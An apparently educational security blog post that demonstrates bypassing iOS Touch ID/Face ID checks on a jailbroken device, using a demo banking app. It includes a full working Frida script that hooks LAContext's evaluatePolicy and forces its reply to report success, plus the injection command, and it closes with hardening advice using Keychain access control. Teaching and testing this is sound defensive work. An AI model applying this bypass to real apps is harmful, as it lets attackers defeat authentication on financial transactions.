Bypassing your apps’ biometric checks on iOS


 

Using iOS biometric features such as Touch ID and Face ID is a really convenient way to authenticate a user before performing a sensitive action. Which actions are protected depends on the app's features; the apps we test usually use Touch ID/Face ID to log in and to confirm financial operations (e.g. a wire transfer). But can these checks be treated as 100% secure?

 

The answer is, of course, no. Biometric checks are performed on the device and, like any other client-side check, they can be bypassed by an attacker who controls the application or the device. In this blog post, I want to show you how easily that can be done.

 

To perform the attack, we need:

 

  • a jailbroken device (if you do not have one, check this presentation),
  • Frida,
  • a text editor. 😉

 

Sample app – SecuBank

 
I prepared a really simple application that asks for your fingerprint/face and then displays a message saying whether the verification succeeded or failed.

 

 
Note that the application’s logic was implemented in Swift:

 

Frida script

 
Now we have to write a Frida script that bypasses the check. As the code snippet above shows, evaluatePolicy reports its result through a reply callback (a closure that receives a Bool success flag and an optional Error), and the app branches on that flag. So, the easiest way to achieve the bypass is to intercept that callback and make sure the app's code is always invoked with success = true, whatever LocalAuthentication actually decided.
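The following is an added example of such a script, written for this page rather than the original post's bypass.js. It assumes the target app calls -[LAContext evaluatePolicy:localizedReason:reply:] (the Objective-C selector behind Swift's evaluatePolicy(_:localizedReason:reply:)) and branches on the Bool passed to the reply block; the function names (forceSuccess, installBiometricBypass) and the log messages are my own. The callback-rewriting part is plain JavaScript, so it can be exercised outside Frida; the hooking part only runs inside Frida's ObjC runtime on the device.

```javascript
// Added example: Frida script that forces the LAContext reply block to report success.
// Not the original post's bypass.js. Assumes the app uses
// LAContext.evaluatePolicy(_:localizedReason:reply:) and trusts the Bool it receives.

// Pure-JS part: wrap the app's reply callback so that, whatever LocalAuthentication
// reported (cancelled prompt, unenrolled finger, lockout, ...), the app is called
// with success = 1 and error = null.
function forceSuccess(appReply) {
  return function (success, error) {
    // The real outcome is logged for the tester and then discarded.
    console.log("[*] evaluatePolicy reply intercepted: success=" + success +
                " error=" + error + " -> rewriting to success=1");
    return appReply(1, null);
  };
}

// ObjC.Block objects whose implementation we replaced. Keeping them referenced
// ensures the NativeCallback behind the new implementation is not garbage
// collected before LocalAuthentication (asynchronously) invokes the block.
var liveBlocks = [];

// Frida-specific part: returns true when the hook was installed, false when the
// Objective-C runtime (i.e. Frida on an iOS process) is not available.
function installBiometricBypass() {
  if (typeof ObjC === "undefined" || !ObjC.available) {
    console.log("[-] Objective-C runtime not available; run with: frida -U -l bypass.js -f <bundle id>");
    return false;
  }
  var LAContext = ObjC.classes.LAContext;
  if (LAContext === undefined) {
    console.log("[-] LocalAuthentication.framework is not loaded in this process");
    return false;
  }
  var evaluatePolicy = LAContext["- evaluatePolicy:localizedReason:reply:"];
  Interceptor.attach(evaluatePolicy.implementation, {
    onEnter: function (args) {
      // args[0] = self, args[1] = _cmd, args[2] = LAPolicy,
      // args[3] = localizedReason (NSString *), args[4] = reply block
      var reply = new ObjC.Block(args[4]);
      var appReply = reply.implementation;          // the app's own closure
      reply.implementation = forceSuccess(appReply); // patch the block in place
      liveBlocks.push(reply);
    }
  });
  console.log("[+] Hooked -[LAContext evaluatePolicy:localizedReason:reply:]");
  return true;
}

installBiometricBypass();
```

The block is patched in place rather than replaced, so the app's original closure still runs (with the forged arguments) and the UI flow of the app is otherwise untouched; the prompt still appears, it just no longer matters what you do with it.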
 

Hacking the SecuBank app

 
Now we just need to spawn SecuBank with the script loaded by Frida:

 

$ frida -U -l bypass.js -f biz.securing.SecuBank --no-pause

Frida spawns the app (-f), injects bypass.js before the app's own code runs, and resumes it (--no-pause). Note that recent versions of frida-tools (12 and later) no longer accept --no-pause, because spawned processes are resumed by default; simply omit the flag there. From now on, whatever happens at the Touch ID/Face ID prompt, the app's callback is invoked with success = true.

 

 

Summary

 

In this article, I showed you once again that any kind of local check can be bypassed, including the biometric ones provided by iOS/macOS. These checks are really convenient, but you always have to remember that they cannot guarantee anything if the device is jailbroken. A Boolean handed back to your app is the weakest way to consume a biometric result; if the action really matters, tie it to something the attacker cannot simply flip, for example a Keychain item protected by an access-control flag (biometryCurrentSet or userPresence), so that the secret is released only after a successful authentication, and verify what is derived from that secret on the server.

 

If you are interested in adding jailbreak detection to your app, take a look at iOS Security Suite, our open-source project!

 

Stay tuned!
